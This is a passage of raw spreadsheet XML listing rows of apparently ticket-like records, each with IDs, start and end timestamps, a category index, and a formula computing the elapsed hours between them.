        <v>7</v>
      </c>
      <c r="E934" s="1">
        <v>43464.883703703701</v>
      </c>
      <c r="F934" s="1">
        <v>43623.292569444442</v>
      </c>
      <c r="G934" t="s">
        <v>2841</v>
      </c>
      <c r="H934" t="str">
        <f>TEXT(F934-E934,"[h]")</f>
        <v>3801</v>
      </c>
    </row>
    <row r="935" spans="1:8">
      <c r="A935" t="s">
        <v>2598</v>
      </c>
      <c r="B935">
        <v>12631</v>
      </c>
      <c r="C935" t="s">
        <v>2599</v>
      </c>
      <c r="D935" t="s">
        <v>7</v>
      </c>
      <c r="E935" s="1">
        <v>43464.760520833333</v>
      </c>
      <c r="F935" s="1">
        <v>43485.040983796294</v>
      </c>
      <c r="G935" t="s">
        <v>126</v>
      </c>
      <c r="H935" t="str">
        <f>TEXT(F935-E935,"[h]")</f>
        <v>486</v>
      </c>
    </row>
    <row r="936" spans="1:8" hidden="1">
      <c r="A936" t="s">
        <v>2842</v>
      </c>
      <c r="B936">
        <v>12630</v>
      </c>
      <c r="C936" t="s">
        <v>2843</v>
      </c>
      <c r="D936" t="s">
        <v>7</v>
      </c>
      <c r="E936" s="1">
        <v>43463.596724537034</v>
      </c>
      <c r="F936" s="1">
        <v>43696.487615740742</v>
      </c>
      <c r="G936" t="s">
        <v>831</v>
      </c>
      <c r="H936" t="str">
        <f>TEXT(F936-E936,"[h]")</f>
        <v>5589</v>
      </c>
    </row>
    <row r="937" spans="1:8">
      <c r="A937" t="s">
        <v>2809</v>
      </c>
      <c r="B937">
        <v>12626</v>
      </c>
      <c r="C937" t="s">
        <v>2810</v>
      </c>
      <c r="D937" t="s">
        <v>7</v>
      </c>
      <c r="E937" s="1">
        <v>43462.136747685188</v>
      </c>
      <c r="F937" s="1">
        <v>43468.804907407408</v>
      </c>
      <c r="G937" t="s">
        <v>16</v>
      </c>
      <c r="H937" t="str">
        <f>TEXT(F937-E937,"[h]")</f>
        <v>160</v>
      </c>
    </row>
    <row r="938" spans="1:8">
      <c r="A938" t="s">
        <v>2657</v>
      </c>
      <c r="B938">
        <v>12624</v>
      </c>
      <c r="C938" t="s">
        <v>2658</v>
      </c>
      <c r="D938" t="s">
        <v>7</v>
      </c>
      <c r="E938" s="1">
        <v>43461.876979166664</v>
      </c>
      <c r="F938" s="1">
        <v>43467.931585648148</v>
      </c>
      <c r="G938" t="s">
        <v>25</v>
      </c>
      <c r="H938" t="str">
        <f>TEXT(F938-E938,"[h]")</f>
        <v>145</v>
      </c>
    </row>
    <row r="939" spans="1:8">
      <c r="A939" t="s">
        <v>2848</v>
      </c>
      <c r="B939">
        <v>12621</v>
      </c>
      <c r="C939" t="s">
        <v>2849</v>
      </c>
      <c r="D939" t="s">
        <v>7</v>
      </c>
      <c r="E939" s="1">
        <v>43461.76326388889</v>
      </c>
      <c r="F939" s="1">
        <v>43461.8200462963</v>
      </c>
      <c r="G939" t="s">
        <v>98</v>
      </c>
      <c r="H939" t="str">
        <f>TEXT(F939-E939,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="940" spans="1:8" hidden="1">
      <c r="A940" t="s">
        <v>2850</v>
      </c>
      <c r="B940">
        <v>12620</v>
      </c>
      <c r="C940" t="s">
        <v>2851</v>
      </c>
      <c r="D940" t="s">
        <v>7</v>
      </c>
      <c r="E940" s="1">
        <v>43461.218842592592</v>
      </c>
      <c r="F940" s="1">
        <v>43475.21601851852</v>
      </c>
      <c r="G940" t="s">
        <v>138</v>
      </c>
      <c r="H940" t="str">
        <f>TEXT(F940-E940,"[h]")</f>
        <v>335</v>
      </c>
    </row>
    <row r="941" spans="1:8" hidden="1">
      <c r="A941" t="s">
        <v>2852</v>
      </c>
      <c r="B941">
        <v>12619</v>
      </c>
      <c r="C941" t="s">
        <v>2853</v>
      </c>
      <c r="D941" t="s">
        <v>7</v>
      </c>
      <c r="E941" s="1">
        <v>43461.174039351848</v>
      </c>
      <c r="F941" s="1">
        <v>43696.486863425926</v>
      </c>
      <c r="G941" t="s">
        <v>831</v>
      </c>
      <c r="H941" t="str">
        <f>TEXT(F941-E941,"[h]")</f>
        <v>5647</v>
      </c>
    </row>
    <row r="942" spans="1:8" hidden="1">
      <c r="A942" t="s">
        <v>2844</v>
      </c>
      <c r="B942">
        <v>12618</v>
      </c>
      <c r="C942" t="s">
        <v>2845</v>
      </c>
      <c r="D942" t="s">
        <v>7</v>
      </c>
      <c r="E942" s="1">
        <v>43460.757974537039</v>
      </c>
      <c r="F942" s="1">
        <v>43461.734930555554</v>
      </c>
      <c r="G942" t="s">
        <v>1681</v>
      </c>
      <c r="H942" t="str">
        <f>TEXT(F942-E942,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="943" spans="1:8">
      <c r="A943" t="s">
        <v>2846</v>
      </c>
      <c r="B943">
        <v>12617</v>
      </c>
      <c r="C943" t="s">
        <v>2847</v>
      </c>
      <c r="D943" t="s">
        <v>7</v>
      </c>
      <c r="E943" s="1">
        <v>43460.728877314818</v>
      </c>
      <c r="F943" s="1">
        <v>43460.768194444441</v>
      </c>
      <c r="G943" t="s">
        <v>16</v>
      </c>
      <c r="H943" t="str">
        <f>TEXT(F943-E943,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="944" spans="1:8" hidden="1">
      <c r="A944" t="s">
        <v>2854</v>
      </c>
      <c r="B944">
        <v>12616</v>
      </c>
      <c r="C944" t="s">
        <v>2855</v>
      </c>
      <c r="D944" t="s">
        <v>7</v>
      </c>
      <c r="E944" s="1">
        <v>43460.469583333332</v>
      </c>
      <c r="F944" s="1">
        <v>43461.015520833331</v>
      </c>
      <c r="G944" t="s">
        <v>174</v>
      </c>
      <c r="H944" t="str">
        <f>TEXT(F944-E944,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="945" spans="1:8" hidden="1">
      <c r="A945" t="s">
        <v>2856</v>
      </c>
      <c r="B945">
        <v>12612</v>
      </c>
      <c r="C945" t="s">
        <v>2857</v>
      </c>
      <c r="D945" t="s">
        <v>7</v>
      </c>
      <c r="E945" s="1">
        <v>43459.783229166664</v>
      </c>
      <c r="F945" s="1">
        <v>43459.805868055555</v>
      </c>
      <c r="G945" t="s">
        <v>55</v>
      </c>
      <c r="H945" t="str">
        <f>TEXT(F945-E945,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="946" spans="1:8">
      <c r="A946" t="s">
        <v>2858</v>
      </c>
      <c r="B946">
        <v>12611</v>
      </c>
      <c r="C946" t="s">
        <v>2859</v>
      </c>
      <c r="D946" t="s">
        <v>7</v>
      </c>
      <c r="E946" s="1">
        <v>43459.753148148149</v>
      </c>
      <c r="F946" s="1">
        <v>43460.669432870367</v>
      </c>
      <c r="G946" t="s">
        <v>16</v>
      </c>
      <c r="H946" t="str">
        <f>TEXT(F946-E946,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="947" spans="1:8" hidden="1">
      <c r="A947" t="s">
        <v>2860</v>
      </c>
      <c r="B947">
        <v>12610</v>
      </c>
      <c r="C947" t="s">
        <v>2861</v>
      </c>
      <c r="D947" t="s">
        <v>7</v>
      </c>
      <c r="E947" s="1">
        <v>43459.714016203703</v>
      </c>
      <c r="F947" s="1">
        <v>43459.736238425925</v>
      </c>
      <c r="G947" t="s">
        <v>55</v>
      </c>
      <c r="H947" t="str">
        <f>TEXT(F947-E947,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="948" spans="1:8" hidden="1">
      <c r="A948" t="s">
        <v>2862</v>
      </c>
      <c r="B948">
        <v>12609</v>
      </c>
      <c r="C948" t="s">
        <v>2863</v>
      </c>
      <c r="D948" t="s">
        <v>7</v>
      </c>
      <c r="E948" s="1">
        <v>43459.462314814817</v>
      </c>
      <c r="F948" s="1">
        <v>43645.060914351852</v>
      </c>
      <c r="G948" t="s">
        <v>258</v>
      </c>
      <c r="H948" t="str">
        <f>TEXT(F948-E948,"[h]")</f>
        <v>4454</v>
      </c>
    </row>
    <row r="949" spans="1:8" hidden="1">
      <c r="A949" t="s">
        <v>1772</v>
      </c>
      <c r="B949">
        <v>12608</v>
      </c>
      <c r="C949" t="s">
        <v>2864</v>
      </c>
      <c r="D949" t="s">
        <v>7</v>
      </c>
      <c r="E949" s="1">
        <v>43459.425034722219</v>
      </c>
      <c r="F949" s="1">
        <v>43460.247557870367</v>
      </c>
      <c r="G949" t="s">
        <v>174</v>
      </c>
      <c r="H949" t="str">
        <f>TEXT(F949-E949,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="950" spans="1:8">
      <c r="A950" t="s">
        <v>2865</v>
      </c>
      <c r="B950">
        <v>12607</v>
      </c>
      <c r="C950" t="s">
        <v>2866</v>
      </c>
      <c r="D950" t="s">
        <v>7</v>
      </c>
      <c r="E950" s="1">
        <v>43458.984768518516</v>
      </c>
      <c r="F950" s="1">
        <v>43460.669432870367</v>
      </c>
      <c r="G950" t="s">
        <v>25</v>
      </c>
      <c r="H950" t="str">
        <f>TEXT(F950-E950,"[h]")</f>
        <v>40</v>
      </c>
    </row>
    <row r="951" spans="1:8" hidden="1">
      <c r="A951" t="s">
        <v>2867</v>
      </c>
      <c r="B951">
        <v>12606</v>
      </c>
      <c r="C951" t="s">
        <v>2868</v>
      </c>
      <c r="D951" t="s">
        <v>7</v>
      </c>
      <c r="E951" s="1">
        <v>43457.799768518518</v>
      </c>
      <c r="F951" s="1">
        <v>43480.222986111112</v>
      </c>
      <c r="G951" t="s">
        <v>66</v>
      </c>
      <c r="H951" t="str">
        <f>TEXT(F951-E951,"[h]")</f>
        <v>538</v>
      </c>
    </row>
    <row r="952" spans="1:8" hidden="1">
      <c r="A952" t="s">
        <v>2869</v>
      </c>
      <c r="B952">
        <v>12605</v>
      </c>
      <c r="C952" t="s">
        <v>2870</v>
      </c>
      <c r="D952" t="s">
        <v>7</v>
      </c>
      <c r="E952" s="1">
        <v>43457.786273148151</v>
      </c>
      <c r="F952" s="1">
        <v>43457.797685185185</v>
      </c>
      <c r="G952" t="s">
        <v>66</v>
      </c>
      <c r="H952" t="str">
        <f>TEXT(F952-E952,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="953" spans="1:8">
      <c r="A953" t="s">
        <v>2871</v>
      </c>
      <c r="B953">
        <v>12604</v>
      </c>
      <c r="C953" t="s">
        <v>2872</v>
      </c>
      <c r="D953" t="s">
        <v>7</v>
      </c>
      <c r="E953" s="1">
        <v>43457.276921296296</v>
      </c>
      <c r="F953" s="1">
        <v>43484.975787037038</v>
      </c>
      <c r="G953" t="s">
        <v>16</v>
      </c>
      <c r="H953" t="str">
        <f>TEXT(F953-E953,"[h]")</f>
        <v>664</v>
      </c>
    </row>
    <row r="954" spans="1:8" hidden="1">
      <c r="A954" t="s">
        <v>2873</v>
      </c>
      <c r="B954">
        <v>12603</v>
      </c>
      <c r="C954" t="s">
        <v>2874</v>
      </c>
      <c r="D954" t="s">
        <v>7</v>
      </c>
      <c r="E954" s="1">
        <v>43457.213750000003</v>
      </c>
      <c r="F954" s="1">
        <v>43458.986875000002</v>
      </c>
      <c r="G954" t="s">
        <v>66</v>
      </c>
      <c r="H954" t="str">
        <f>TEXT(F954-E954,"[h]")</f>
        <v>42</v>
      </c>
    </row>
    <row r="955" spans="1:8" hidden="1">
      <c r="A955" t="s">
        <v>2666</v>
      </c>
      <c r="B955">
        <v>12602</v>
      </c>
      <c r="C955" t="s">
        <v>2875</v>
      </c>
      <c r="D955" t="s">
        <v>7</v>
      </c>
      <c r="E955" s="1">
        <v>43455.790289351855</v>
      </c>
      <c r="F955" s="1">
        <v>43458.92083333333</v>
      </c>
      <c r="G955" t="s">
        <v>51</v>
      </c>
      <c r="H955" t="str">
        <f>TEXT(F955-E955,"[h]")</f>
        <v>75</v>
      </c>
    </row>
    <row r="956" spans="1:8" hidden="1">
      <c r="A956" t="s">
        <v>2876</v>
      </c>
      <c r="B956">
        <v>12601</v>
      </c>
      <c r="C956" t="s">
        <v>2877</v>
      </c>
      <c r="D956" t="s">
        <v>7</v>
      </c>
      <c r="E956" s="1">
        <v>43454.822222222225</v>
      </c>
      <c r="F956" s="1">
        <v>43461.301840277774</v>
      </c>
      <c r="G956" t="s">
        <v>75</v>
      </c>
      <c r="H956" t="str">
        <f>TEXT(F956-E956,"[h]")</f>
        <v>155</v>
      </c>
    </row>
    <row r="957" spans="1:8" hidden="1">
      <c r="A957" t="s">
        <v>2878</v>
      </c>
      <c r="B957">
        <v>12598</v>
      </c>
      <c r="C957" t="s">
        <v>2879</v>
      </c>
      <c r="D957" t="s">
        <v>7</v>
      </c>
      <c r="E957" s="1">
        <v>43454.678067129629</v>
      </c>
      <c r="F957" s="1">
        <v>43753.836724537039</v>
      </c>
      <c r="G957" t="s">
        <v>2880</v>
      </c>
      <c r="H957" t="str">
        <f>TEXT(F957-E957,"[h]")</f>
        <v>7179</v>
      </c>
    </row>
    <row r="958" spans="1:8" hidden="1">
      <c r="A958" t="s">
        <v>2881</v>
      </c>
      <c r="B958">
        <v>12597</v>
      </c>
      <c r="C958" t="s">
        <v>2882</v>
      </c>
      <c r="D958" t="s">
        <v>7</v>
      </c>
      <c r="E958" s="1">
        <v>43454.59</v>
      </c>
      <c r="F958" s="1">
        <v>43581.001921296294</v>
      </c>
      <c r="G958" t="s">
        <v>2883</v>
      </c>
      <c r="H958" t="str">
        <f>TEXT(F958-E958,"[h]")</f>
        <v>3033</v>
      </c>
    </row>
    <row r="959" spans="1:8" hidden="1">
      <c r="A959" t="s">
        <v>2884</v>
      </c>
      <c r="B959">
        <v>12596</v>
      </c>
      <c r="C959" t="s">
        <v>2885</v>
      </c>
      <c r="D959" t="s">
        <v>7</v>
      </c>
      <c r="E959" s="1">
        <v>43453.815185185187</v>
      </c>
      <c r="F959" s="1">
        <v>43478.338807870372</v>
      </c>
      <c r="G959" t="s">
        <v>37</v>
      </c>
      <c r="H959" t="str">
        <f>TEXT(F959-E959,"[h]")</f>
        <v>588</v>
      </c>
    </row>
    <row r="960" spans="1:8" hidden="1">
      <c r="A960" t="s">
        <v>2886</v>
      </c>
      <c r="B960">
        <v>12595</v>
      </c>
      <c r="C960" t="s">
        <v>2887</v>
      </c>
      <c r="D960" t="s">
        <v>7</v>
      </c>
      <c r="E960" s="1">
        <v>43453.747673611113</v>
      </c>
      <c r="F960" s="1">
        <v>43480.223993055559</v>
      </c>
      <c r="G960" t="s">
        <v>115</v>
      </c>
      <c r="H960" t="str">
        <f>TEXT(F960-E960,"[h]")</f>
        <v>635</v>
      </c>
    </row>
    <row r="961" spans="1:8" hidden="1">
      <c r="A961" t="s">
        <v>2888</v>
      </c>
      <c r="B961">
        <v>12594</v>
      </c>
      <c r="C961" t="s">
        <v>2889</v>
      </c>
      <c r="D961" t="s">
        <v>7</v>
      </c>
      <c r="E961" s="1">
        <v>43453.357476851852</v>
      </c>
      <c r="F961" s="1">
        <v>43577.710173611114</v>
      </c>
      <c r="G961" t="s">
        <v>2890</v>
      </c>
      <c r="H961" t="str">
        <f>TEXT(F961-E961,"[h]")</f>
        <v>2984</v>
      </c>
    </row>
    <row r="962" spans="1:8" hidden="1">
      <c r="A962" t="s">
        <v>2891</v>
      </c>
      <c r="B962">
        <v>12593</v>
      </c>
      <c r="C962" t="s">
        <v>2892</v>
      </c>
      <c r="D962" t="s">
        <v>7</v>
      </c>
      <c r="E962" s="1">
        <v>43453.356134259258</v>
      </c>
      <c r="F962" s="1">
        <v>43485.109479166669</v>
      </c>
      <c r="G962" t="s">
        <v>1917</v>
      </c>
      <c r="H962" t="str">
        <f>TEXT(F962-E962,"[h]")</f>
        <v>762</v>
      </c>
    </row>
    <row r="963" spans="1:8">
      <c r="A963" t="s">
        <v>2655</v>
      </c>
      <c r="B963">
        <v>12592</v>
      </c>
      <c r="C963" t="s">
        <v>2656</v>
      </c>
      <c r="D963" t="s">
        <v>7</v>
      </c>
      <c r="E963" s="1">
        <v>43453.271550925929</v>
      </c>
      <c r="F963" s="1">
        <v>43453.370810185188</v>
      </c>
      <c r="G963" t="s">
        <v>1709</v>
      </c>
      <c r="H963" t="str">
        <f>TEXT(F963-E963,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="964" spans="1:8" hidden="1">
      <c r="A964" t="s">
        <v>2893</v>
      </c>
      <c r="B964">
        <v>12591</v>
      </c>
      <c r="C964" t="s">
        <v>2894</v>
      </c>
      <c r="D964" t="s">
        <v>7</v>
      </c>
      <c r="E964" s="1">
        <v>43453.216192129628</v>
      </c>
      <c r="F964" s="1">
        <v>43467.285069444442</v>
      </c>
      <c r="G964" t="s">
        <v>320</v>
      </c>
      <c r="H964" t="str">
        <f>TEXT(F964-E964,"[h]")</f>
        <v>337</v>
      </c>
    </row>
    <row r="965" spans="1:8" hidden="1">
      <c r="A965" t="s">
        <v>2895</v>
      </c>
      <c r="B965">
        <v>12590</v>
      </c>
      <c r="C965" t="s">
        <v>2896</v>
      </c>
      <c r="D965" t="s">
        <v>7</v>
      </c>
      <c r="E965" s="1">
        <v>43452.781550925924</v>
      </c>
      <c r="F965" s="1">
        <v>43453.826284722221</v>
      </c>
      <c r="G965" t="s">
        <v>2897</v>
      </c>
      <c r="H965" t="str">
        <f>TEXT(F965-E965,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="966" spans="1:8" hidden="1">
      <c r="A966" t="s">
        <v>2898</v>
      </c>
      <c r="B966">
        <v>12589</v>
      </c>
      <c r="C966" t="s">
        <v>2899</v>
      </c>
      <c r="D966" t="s">
        <v>7</v>
      </c>
      <c r="E966" s="1">
        <v>43452.771863425929</v>
      </c>
      <c r="F966" s="1">
        <v>43455.765648148146</v>
      </c>
      <c r="G966" t="s">
        <v>2900</v>
      </c>
      <c r="H966" t="str">
        <f>TEXT(F966-E966,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="967" spans="1:8">
      <c r="A967" t="s">
        <v>2903</v>
      </c>
      <c r="B967">
        <v>12587</v>
      </c>
      <c r="C967" t="s">
        <v>2904</v>
      </c>
      <c r="D967" t="s">
        <v>7</v>
      </c>
      <c r="E967" s="1">
        <v>43452.642743055556</v>
      </c>
      <c r="F967" s="1">
        <v>43452.68172453704</v>
      </c>
      <c r="G967" t="s">
        <v>2905</v>
      </c>
      <c r="H967" t="str">
        <f>TEXT(F967-E967,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="968" spans="1:8" hidden="1">
      <c r="B968">
        <v>12584</v>
      </c>
      <c r="C968" t="s">
        <v>2906</v>
      </c>
      <c r="D968" t="s">
        <v>7</v>
      </c>
      <c r="E968" s="1">
        <v>43452.377002314817</v>
      </c>
      <c r="F968" s="1">
        <v>43452.409224537034</v>
      </c>
      <c r="G968" t="s">
        <v>75</v>
      </c>
      <c r="H968" t="str">
        <f>TEXT(F968-E968,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="969" spans="1:8" hidden="1">
      <c r="A969" t="s">
        <v>2907</v>
      </c>
      <c r="B969">
        <v>12583</v>
      </c>
      <c r="C969" t="s">
        <v>2908</v>
      </c>
      <c r="D969" t="s">
        <v>7</v>
      </c>
      <c r="E969" s="1">
        <v>43452.200057870374</v>
      </c>
      <c r="F969" s="1">
        <v>43452.635717592595</v>
      </c>
      <c r="G969" t="s">
        <v>2909</v>
      </c>
      <c r="H969" t="str">
        <f>TEXT(F969-E969,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="970" spans="1:8" hidden="1">
      <c r="A970" t="s">
        <v>2917</v>
      </c>
      <c r="B970">
        <v>12579</v>
      </c>
      <c r="C970" t="s">
        <v>2918</v>
      </c>
      <c r="D970" t="s">
        <v>7</v>
      </c>
      <c r="E970" s="1">
        <v>43451.832696759258</v>
      </c>
      <c r="F970" s="1">
        <v>43452.059988425928</v>
      </c>
      <c r="G970" t="s">
        <v>2919</v>
      </c>
      <c r="H970" t="str">
        <f>TEXT(F970-E970,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="971" spans="1:8" hidden="1">
      <c r="A971" t="s">
        <v>2912</v>
      </c>
      <c r="B971">
        <v>12578</v>
      </c>
      <c r="C971" t="s">
        <v>2913</v>
      </c>
      <c r="D971" t="s">
        <v>7</v>
      </c>
      <c r="E971" s="1">
        <v>43451.782013888886</v>
      </c>
      <c r="F971" s="1">
        <v>43451.804467592592</v>
      </c>
      <c r="G971" t="s">
        <v>95</v>
      </c>
      <c r="H971" t="str">
        <f>TEXT(F971-E971,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="972" spans="1:8">
      <c r="A972" t="s">
        <v>2910</v>
      </c>
      <c r="B972">
        <v>12577</v>
      </c>
      <c r="C972" t="s">
        <v>2911</v>
      </c>
      <c r="D972" t="s">
        <v>7</v>
      </c>
      <c r="E972" s="1">
        <v>43451.780416666668</v>
      </c>
      <c r="F972" s="1">
        <v>43451.994201388887</v>
      </c>
      <c r="G972" t="s">
        <v>483</v>
      </c>
      <c r="H972" t="str">
        <f>TEXT(F972-E972,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="973" spans="1:8" hidden="1">
      <c r="A973" t="s">
        <v>2920</v>
      </c>
      <c r="B973">
        <v>12575</v>
      </c>
      <c r="C973" t="s">
        <v>2921</v>
      </c>
      <c r="D973" t="s">
        <v>7</v>
      </c>
      <c r="E973" s="1">
        <v>43451.445960648147</v>
      </c>
      <c r="F973" s="1">
        <v>43453.257662037038</v>
      </c>
      <c r="G973" t="s">
        <v>37</v>
      </c>
      <c r="H973" t="str">
        <f>TEXT(F973-E973,"[h]")</f>
        <v>43</v>
      </c>
    </row>
    <row r="974" spans="1:8">
      <c r="A974" t="s">
        <v>2924</v>
      </c>
      <c r="B974">
        <v>12572</v>
      </c>
      <c r="C974" t="s">
        <v>2925</v>
      </c>
      <c r="D974" t="s">
        <v>7</v>
      </c>
      <c r="E974" s="1">
        <v>43451.03361111111</v>
      </c>
      <c r="F974" s="1">
        <v>43451.601469907408</v>
      </c>
      <c r="G974" t="s">
        <v>2916</v>
      </c>
      <c r="H974" t="str">
        <f>TEXT(F974-E974,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="975" spans="1:8">
      <c r="A975" t="s">
        <v>2926</v>
      </c>
      <c r="B975">
        <v>12571</v>
      </c>
      <c r="C975" t="s">
        <v>2927</v>
      </c>
      <c r="D975" t="s">
        <v>7</v>
      </c>
      <c r="E975" s="1">
        <v>43450.959513888891</v>
      </c>
      <c r="F975" s="1">
        <v>43451.000613425924</v>
      </c>
      <c r="G975" t="s">
        <v>2916</v>
      </c>
      <c r="H975" t="str">
        <f>TEXT(F975-E975,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="976" spans="1:8">
      <c r="A976" t="s">
        <v>2928</v>
      </c>
      <c r="B976">
        <v>12570</v>
      </c>
      <c r="C976" t="s">
        <v>2929</v>
      </c>
      <c r="D976" t="s">
        <v>7</v>
      </c>
      <c r="E976" s="1">
        <v>43450.806273148148</v>
      </c>
      <c r="F976" s="1">
        <v>43450.941435185188</v>
      </c>
      <c r="G976" t="s">
        <v>98</v>
      </c>
      <c r="H976" t="str">
        <f>TEXT(F976-E976,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="977" spans="1:8">
      <c r="A977" t="s">
        <v>2932</v>
      </c>
      <c r="B977">
        <v>12568</v>
      </c>
      <c r="C977" t="s">
        <v>2933</v>
      </c>
      <c r="D977" t="s">
        <v>7</v>
      </c>
      <c r="E977" s="1">
        <v>43450.799004629633</v>
      </c>
      <c r="F977" s="1">
        <v>43450.942395833335</v>
      </c>
      <c r="G977" t="s">
        <v>2934</v>
      </c>
      <c r="H977" t="str">
        <f>TEXT(F977-E977,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="978" spans="1:8">
      <c r="A978" t="s">
        <v>2914</v>
      </c>
      <c r="B978">
        <v>12566</v>
      </c>
      <c r="C978" t="s">
        <v>2915</v>
      </c>
      <c r="D978" t="s">
        <v>7</v>
      </c>
      <c r="E978" s="1">
        <v>43450.786921296298</v>
      </c>
      <c r="F978" s="1">
        <v>43451.606678240743</v>
      </c>
      <c r="G978" t="s">
        <v>2916</v>
      </c>
      <c r="H978" t="str">
        <f>TEXT(F978-E978,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="979" spans="1:8">
      <c r="A979" t="s">
        <v>2938</v>
      </c>
      <c r="B979">
        <v>12565</v>
      </c>
      <c r="C979" t="s">
        <v>2939</v>
      </c>
      <c r="D979" t="s">
        <v>7</v>
      </c>
      <c r="E979" s="1">
        <v>43450.714328703703</v>
      </c>
      <c r="F979" s="1">
        <v>43450.786909722221</v>
      </c>
      <c r="G979" t="s">
        <v>2940</v>
      </c>
      <c r="H979" t="str">
        <f>TEXT(F979-E979,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="980" spans="1:8" hidden="1">
      <c r="A980" t="s">
        <v>2947</v>
      </c>
      <c r="B980">
        <v>12560</v>
      </c>
      <c r="C980" t="s">
        <v>1932</v>
      </c>
      <c r="D980" t="s">
        <v>7</v>
      </c>
      <c r="E980" s="1">
        <v>43450.631863425922</v>
      </c>
      <c r="F980" s="1">
        <v>43451.805671296293</v>
      </c>
      <c r="G980" t="s">
        <v>2948</v>
      </c>
      <c r="H980" t="str">
        <f>TEXT(F980-E980,"[h]")</f>
        <v>28</v>
      </c>
    </row>
    <row r="981" spans="1:8">
      <c r="A981" t="s">
        <v>2949</v>
      </c>
      <c r="B981">
        <v>12556</v>
      </c>
      <c r="C981" t="s">
        <v>2950</v>
      </c>
      <c r="D981" t="s">
        <v>7</v>
      </c>
      <c r="E981" s="1">
        <v>43450.403923611113</v>
      </c>
      <c r="F981" s="1">
        <v>43450.674803240741</v>
      </c>
      <c r="G981" t="s">
        <v>98</v>
      </c>
      <c r="H981" t="str">
        <f>TEXT(F981-E981,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="982" spans="1:8">
      <c r="A982" t="s">
        <v>2951</v>
      </c>
      <c r="B982">
        <v>12555</v>
      </c>
      <c r="C982" t="s">
        <v>2952</v>
      </c>
      <c r="D982" t="s">
        <v>7</v>
      </c>
      <c r="E982" s="1">
        <v>43450.402442129627</v>
      </c>
      <c r="F982" s="1">
        <v>43450.673333333332</v>
      </c>
      <c r="G982" t="s">
        <v>16</v>
      </c>
      <c r="H982" t="str">
        <f>TEXT(F982-E982,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="983" spans="1:8" hidden="1">
      <c r="A983" t="s">
        <v>2943</v>
      </c>
      <c r="B983">
        <v>12554</v>
      </c>
      <c r="C983" t="s">
        <v>2944</v>
      </c>
      <c r="D983" t="s">
        <v>7</v>
      </c>
      <c r="E983" s="1">
        <v>43449.700752314813</v>
      </c>
      <c r="F983" s="1">
        <v>43449.791481481479</v>
      </c>
      <c r="G983" t="s">
        <v>255</v>
      </c>
      <c r="H983" t="str">
        <f>TEXT(F983-E983,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="984" spans="1:8" hidden="1">
      <c r="A984" t="s">
        <v>2953</v>
      </c>
      <c r="B984">
        <v>12553</v>
      </c>
      <c r="C984" t="s">
        <v>2954</v>
      </c>
      <c r="D984" t="s">
        <v>7</v>
      </c>
      <c r="E984" s="1">
        <v>43449.627210648148</v>
      </c>
      <c r="F984" s="1">
        <v>43453.994780092595</v>
      </c>
      <c r="G984" t="s">
        <v>2955</v>
      </c>
      <c r="H984" t="str">
        <f>TEXT(F984-E984,"[h]")</f>
        <v>104</v>
      </c>
    </row>
    <row r="985" spans="1:8" hidden="1">
      <c r="A985" t="s">
        <v>2956</v>
      </c>
      <c r="B985">
        <v>12552</v>
      </c>
      <c r="C985" t="s">
        <v>2957</v>
      </c>
      <c r="D985" t="s">
        <v>7</v>
      </c>
      <c r="E985" s="1">
        <v>43449.577118055553</v>
      </c>
      <c r="F985" s="1">
        <v>43460.677002314813</v>
      </c>
      <c r="G985" t="s">
        <v>1729</v>
      </c>
      <c r="H985" t="str">
        <f>TEXT(F985-E985,"[h]")</f>
        <v>266</v>
      </c>
    </row>
    <row r="986" spans="1:8" hidden="1">
      <c r="A986" t="s">
        <v>2662</v>
      </c>
      <c r="B986">
        <v>12551</v>
      </c>
      <c r="C986" t="s">
        <v>2663</v>
      </c>
      <c r="D986" t="s">
        <v>7</v>
      </c>
      <c r="E986" s="1">
        <v>43449.309027777781</v>
      </c>
      <c r="F986" s="1">
        <v>43465.728449074071</v>
      </c>
      <c r="G986" t="s">
        <v>1302</v>
      </c>
      <c r="H986" t="str">
        <f>TEXT(F986-E986,"[h]")</f>
        <v>394</v>
      </c>
    </row>
    <row r="987" spans="1:8" hidden="1">
      <c r="A987" t="s">
        <v>2958</v>
      </c>
      <c r="B987">
        <v>12549</v>
      </c>
      <c r="C987" t="s">
        <v>2959</v>
      </c>
      <c r="D987" t="s">
        <v>7</v>
      </c>
      <c r="E987" s="1">
        <v>43448.82234953704</v>
      </c>
      <c r="F987" s="1">
        <v>43466.86922453704</v>
      </c>
      <c r="G987" t="s">
        <v>95</v>
      </c>
      <c r="H987" t="str">
        <f>TEXT(F987-E987,"[h]")</f>
        <v>433</v>
      </c>
    </row>
    <row r="988" spans="1:8" hidden="1">
      <c r="A988" t="s">
        <v>2960</v>
      </c>
      <c r="B988">
        <v>12547</v>
      </c>
      <c r="C988" t="s">
        <v>2035</v>
      </c>
      <c r="D988" t="s">
        <v>7</v>
      </c>
      <c r="E988" s="1">
        <v>43448.672025462962</v>
      </c>
      <c r="F988" s="1">
        <v>43545.656481481485</v>
      </c>
      <c r="G988" t="s">
        <v>222</v>
      </c>
      <c r="H988" t="str">
        <f>TEXT(F988-E988,"[h]")</f>
        <v>2327</v>
      </c>
